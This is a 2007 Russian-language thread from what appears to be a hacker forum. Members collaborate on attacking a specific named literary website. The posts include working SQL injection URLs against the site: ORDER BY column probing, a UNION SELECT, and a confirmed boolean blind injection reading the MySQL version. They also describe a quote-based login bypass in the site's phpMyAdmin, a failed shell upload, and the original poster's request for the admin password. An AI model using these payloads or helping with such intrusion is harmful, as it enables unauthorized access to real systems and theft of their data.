Sql inj на сайте

Discussion in 'Уязвимости' started by NighSh, 6 Mar 2007.

  1. NighSh

    NighSh New Member

    Joined:
    20 Nov 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    1
    Всем снова привет =)
    Вобщем начал я читать книги, статьи... чуток стал разбираться...
    И вернулся все к тому же сайту- www.litsovet.ru
    Там вроде есть SQL inj...
    я с инекцией пока плохо знаком, но...
    1 http://litsovet.ru/index.php/material.read?material_id=
    (ставим кавычку получем вот такую фигню-
    4¶ .4¶ ..Ў7¶staffЙВ’6¶ .htaccess9зГW¶kvit.htmIrз_W¶tz.zipВ•6¶author.action.cphpЖmM¶ index.bakNзD\¶t.phpЗ�6¶ css›6¶files1ГИ6¶imagesВ”tВ phpMyAdminА¬7¶gallery.action.cphp7¶ index.phpQз®7¶journal.action.cphpЇ7¶ konkurs.download.cphp+Г°7¶ konkurs.download.php5+Г±7¶litob.action.cphp®Гх6¶ material.action.cphp¬В©Z¶ robots.txtз®6¶$publications.action.cphp±В[¶ regs.php‰vзa.php8Вr4¶$sounds.action.cphpВ.oldЉUзPИВtempцЎВоT¶ journal.download.phpЂ®В@U¶ knop1.gifaзz”Дaaaaa&ГmyadminSРВ remЌ .info.php^uАэW¶ viewcooc.php9eАW¶index.php.currentЕ®PАtiny_mcez¦Ж]¶asd.htmlYіз9¶ captcha.phpd¶ mailtest.php9eА::¶imap.php№{зжb¶А kvitsb.htmзўf¶¬subscribe_confirm.phpљВ)
    Это доказывает наличие уязвимости?!
    Так же если в id= поставить "равенство" поста ну типа 964=965-1, то получим страницу 964...
    Эм... проблема в том, что я пока не могу понять как искать поля =/
    кто нить поможет?

    Интересные вещи:
    Там стоит Phpmyadmin, если в нем место логина поставить ковычку, то мы попадем в админку... тока с без привелегий(шелл залить не удалось =/ )
    А ели обратится к ФТП этого сайта, и тоже вместо логина поставить ковычку, то поле логина просто исчезнет...
    Вот...
    просто хочу на примере разобраться в sql inj

    Заранее спасибо =)
    А еще спасибо тем, кто помог хоть чуток встать мне на правильный путь =)
     
  2. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    если там не ставить кавычку то все-равно такая фигня вылазит, и это не sql-injection...
    Просто криво написанный движок...
    кстати в этой ошибке видны файлы лежать в директории... ;)
     
  3. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    ггг накосяченый софт, кароче там типа листинг гг)
     
  4. NighSh

    NighSh New Member

    Joined:
    20 Nov 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    1
    То есть хренушки мне а не иньекция?! (((
    эм... блин, ну кому не влом, ну подскажите че делать то...
    как добыть пасс админа без Xss =/
    Пожалуйста =)))
     
  5. NighSh

    NighSh New Member

    Joined:
    20 Nov 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    1
    а что такое CRLF injection?
     
  6. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    какая то хрень если честно
    http://litsovet.ru/index.php/material.read?material_id=1+order+by+31 - ошибка
    http://litsovet.ru/index.php/material.read?material_id=1+order+by+30 - ошибки нет
    НО
    http://litsovet.ru/index.php/material.read?material_id=30+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
    так тоже ошибка =\
     
  7. NighSh

    NighSh New Member

    Joined:
    20 Nov 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    1
    так все таки есть там иньекция =)))?!
     
  8. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    есть.
    http://litsovet.ru/index.php/material.read?material_id=123201+and(ascii(substring(version(),1,1))>51)
    мускул 3 ветки, так что юнион не работает..

    +там по идее кривая читалка файлов, ты подума получше, может чтото сможешь намутить с ней ;)
     
    _________________________
  9. NighSh

    NighSh New Member

    Joined:
    20 Nov 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    1
    эм... и еще если не сложно скажите, а какого рака если я в ПХП МОЙ АДМИН в логине ставлю ковычку, то обхажу авторизацию?
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    c411k, хех, точно
    Просто совсем забыл про 3 ветку